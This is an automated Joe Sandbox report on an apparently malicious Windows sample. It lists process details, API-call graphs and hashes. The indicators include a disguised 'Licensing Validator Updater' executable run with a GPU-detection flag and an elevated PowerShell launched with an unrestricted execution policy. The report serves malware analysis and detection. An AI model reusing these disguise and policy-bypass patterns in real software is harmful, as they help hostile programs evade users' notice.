                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff68cfc0000
                                                                                                                                                                                                                                                                                                                                                      File size:5'900'128 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                                                                                                                                      Start time:14:47:02
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:powershell -ep Unrestricted
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7582a0000
                                                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000003.1914337956.0000031783A41000.00000020.00000800.00020000.00000000.sdmp, Offset: 0000031783A41000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_3_31783a41000_firefox.jbxd

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:0.3%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:100%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:6
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                                                                        execution_graph 5003 27126404f32 5004 27126404f89 NtQuerySystemInformation 5003->5004 5005 27126403304 5003->5005 5004->5005 5000 271256f2377 5001 271256f2387 NtQuerySystemInformation 5000->5001 5002 271256f2324 5001->5002

                                                                                                                                                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2666874089.0000027126402000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000027126402000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_27126402000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                                                                                                                                                                                                        • String ID: #$#$#$4$>$>$>$A$z$z
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3562636166-3072146587
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2639544456.00000271256F0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000271256F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_271256f0000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2666874089.0000027126402000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000027126402000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_27126402000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: #$4$z
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-222932584

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 2850 271256fe100-271256fe143 2851 271256fe147-271256fe149 2850->2851 2852 271256fe14b-271256fe182 2851->2852 2853 271256fe19f-271256fe1d1 2851->2853 2852->2853
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2639544456.00000271256FE000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000271256FE000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_271256fe000_firefox.jbxd
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.2666874089.0000027126402000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000027126402000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_27126402000_firefox.jbxd

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:4.6%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 6465 7ffeb319829a 6466 7ffeb31982d1 GetFileAttributesW 6465->6466 6468 7ffeb3198336 6466->6468 6469 7ffeb3198ada 6470 7ffeb31a6e00 ComputeAccessTokenFromCodeAuthzLevel 6469->6470 6472 7ffeb31a6eae 6470->6472 6473 7ffeb319365c 6474 7ffeb3193665 6473->6474 6477 7ffeb3192d88 6474->6477 6476 7ffeb31936e3 6478 7ffeb3192d8d 6477->6478 6479 7ffeb31a9293 GetSystemInfo 6478->6479 6481 7ffeb31a9200 6478->6481 6480 7ffeb31a92ce 6479->6480 6480->6476 6481->6476

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 147 7ffeb3198ada-7ffeb31a6eac ComputeAccessTokenFromCodeAuthzLevel 151 7ffeb31a6eae 147->151 152 7ffeb31a6eb4-7ffeb31a6ee3 147->152 151->152
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 132034935-0

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 154 7ffeb31971f2-7ffeb31982f8 158 7ffeb31982fa-7ffeb31982ff 154->158 159 7ffeb3198302-7ffeb3198334 GetFileAttributesW 154->159 158->159 160 7ffeb3198336 159->160 161 7ffeb319833c-7ffeb3198361 159->161 160->161
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0

Control-flow Graph (figure omitted; legend: Executed / Not Executed; the graph includes a GetFileAttributesW call)
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0

Control-flow Graph (figure omitted; legend: Executed / Not Executed; the graph includes a GetFileAttributesW call)
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2858544880.00007FFEB3190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3190000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3190000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2904973031.00007FFEB3900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3900000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3900000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:

Control-flow Graph (figure omitted; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2875850125.00007FFEB3490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3490000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3490000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
Memory Dump Source
• Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2917696656.00007FFEB3AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3AE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3ae0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 57fda6768e7f5776c6aad832bec9641d3623a14ecc1099dea951a46fcf730cc4
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: defa0cc0943aac919fc3eee78539d3885b82af8ddbb337b3fade22cf301f2159
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57fda6768e7f5776c6aad832bec9641d3623a14ecc1099dea951a46fcf730cc4
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13D0A702F1CC1E4FA7D1B52CF8567E953C6DBE8670B6C0762D80CC3256E8199C9207C1
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2895942618.00007FFEB37A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB37A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb37a0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e1fa4caa191ae24c79c7ba12ed946cf826a4ed0caf09b9be471284ff55509e29
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e4ef34cdd3ee3cf4c07266dc2bf8936cb3ef882d6b82ddd2156f61794f750d2e
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1fa4caa191ae24c79c7ba12ed946cf826a4ed0caf09b9be471284ff55509e29
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56D02B2274D5071ED704035C78923F6AB50EF12324F4416B6E58881187CA0B5042E381
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000014.00000002.2917696656.00007FFEB3AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3AE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_20_2_7ffeb3ae0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 25ddc88aed1123fcb0a05180b6972e60df4691aaff3157263351311a07940dde
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c3b026cc3af68f4f70068e407ed399e316a1f2390ff58a5874f11245f2bde021
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ddc88aed1123fcb0a05180b6972e60df4691aaff3157263351311a07940dde
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0D0A700F0DA9D1F9A55E27D102319EAED3CF94940B5843BDD48BE35EFCD08480243C5

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:4.6%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 6567 7ffeb3169e91 6568 7ffeb3169e9f GetFileAttributesW 6567->6568 6570 7ffeb3169f46 6568->6570 6558 7ffeb3164c60 6559 7ffeb3164c6c 6558->6559 6562 7ffeb3164928 6559->6562 6561 7ffeb3164cdf 6563 7ffeb316492d 6562->6563 6564 7ffeb31742a3 GetSystemInfo 6563->6564 6566 7ffeb3174210 6563->6566 6565 7ffeb31742de 6564->6565 6565->6561 6566->6561 6571 7ffeb316ac9b 6572 7ffeb3173bf0 ComputeAccessTokenFromCodeAuthzLevel 6571->6572 6574 7ffeb3173c9e 6572->6574

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2320397532.00007FFEB3790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3790000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3790000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: AVWV
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-489655572
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 82d3a61ee63dc048d7ec10e5a3d8a25c11dd6ec4ae9753de3c4b22faf2d8ce8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 88768fc398b3da014b1b84061ada70fbf24b43ea0079b2a6fd2d8cfbe3352489
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82d3a61ee63dc048d7ec10e5a3d8a25c11dd6ec4ae9753de3c4b22faf2d8ce8e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09F1583090EA5A5FE758DB2C84466B677E2EF65310F1407BDD18E8B1E3DE28B846C781

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 98 7ffeb3164928-7ffeb31741e7 103 7ffeb3174231-7ffeb317424a 98->103 104 7ffeb31741e9-7ffeb31741fd 98->104 107 7ffeb317424b-7ffeb317424f 103->107 105 7ffeb31741ff-7ffeb3174202 104->105 106 7ffeb3174256-7ffeb3174281 104->106 108 7ffeb3174204-7ffeb3174206 105->108 109 7ffeb3174283-7ffeb3174287 105->109 113 7ffeb3174282 106->113 115 7ffeb3174251-7ffeb3174255 107->115 108->113 114 7ffeb3174208 108->114 112 7ffeb3174288-7ffeb31742dc GetSystemInfo 109->112 119 7ffeb31742e4-7ffeb3174300 112->119 120 7ffeb31742de 112->120 113->109 114->107 116 7ffeb317420a-7ffeb317420c 114->116 115->106 116->112 118 7ffeb317420e 116->118 118->115 121 7ffeb3174210-7ffeb317422c call 7ffeb3172dc0 118->121 120->119
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a4b1fc8d6fe90217279a71b420f54acb561c7b3d6911549b33c527bada4b814
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ade3d37e9263aa89565eed924255f2d1e9589cb53dc02ad14b021347add08ec0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a4b1fc8d6fe90217279a71b420f54acb561c7b3d6911549b33c527bada4b814
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F411571D0CA4C8FE764DB6C98066F97BE0FF69320F04022BD14DE3191DF6564568B81

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 124 7ffeb316ac9b-7ffeb3173c9c ComputeAccessTokenFromCodeAuthzLevel 128 7ffeb3173ca4-7ffeb3173cd3 124->128 129 7ffeb3173c9e 124->129 129->128
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 132034935-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f97a138c6fcfb3999f8e09c2c1172d6f510828e6686c7ca8f449fb2d2186ed71
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: da47a2b543856803896ccdb6ba584ae70f5af0a7fbc2509e0c5ae045c83009cc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f97a138c6fcfb3999f8e09c2c1172d6f510828e6686c7ca8f449fb2d2186ed71
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A318571908A1C8FDB18DB5CD8456F9B7E1FB59321F04422FD04AE3251DB74A8568BC1

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 131 7ffeb3169e91-7ffeb3169e9d 132 7ffeb3169ea1-7ffeb3169eda 131->132 133 7ffeb3169e9f 131->133 134 7ffeb3169ee1-7ffeb3169f08 132->134 133->132 133->134 137 7ffeb3169f12-7ffeb3169f44 GetFileAttributesW 134->137 138 7ffeb3169f0a-7ffeb3169f0f 134->138 139 7ffeb3169f4c-7ffeb3169f71 137->139 140 7ffeb3169f46 137->140 138->137 140->139
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b5516ba00ce57f97ca258ba270cfbf8e27b379ee55fca9a13d07349f25e216ba
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b5eaa70a5020c62f3c630a6c9e9c2b7deccfbb9b6f15232e7434407d8910edbc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5516ba00ce57f97ca258ba270cfbf8e27b379ee55fca9a13d07349f25e216ba
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131A13190CA4C8FDB59DFA88849AF9BFF0EF66321F14426FD049D3662DB646805CB81

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 142 7ffeb3168c7b-7ffeb3169f08 146 7ffeb3169f12-7ffeb3169f44 GetFileAttributesW 142->146 147 7ffeb3169f0a-7ffeb3169f0f 142->147 148 7ffeb3169f4c-7ffeb3169f71 146->148 149 7ffeb3169f46 146->149 147->146 149->148
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000002.2288103168.00007FFEB3160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB3160000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffeb3160000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
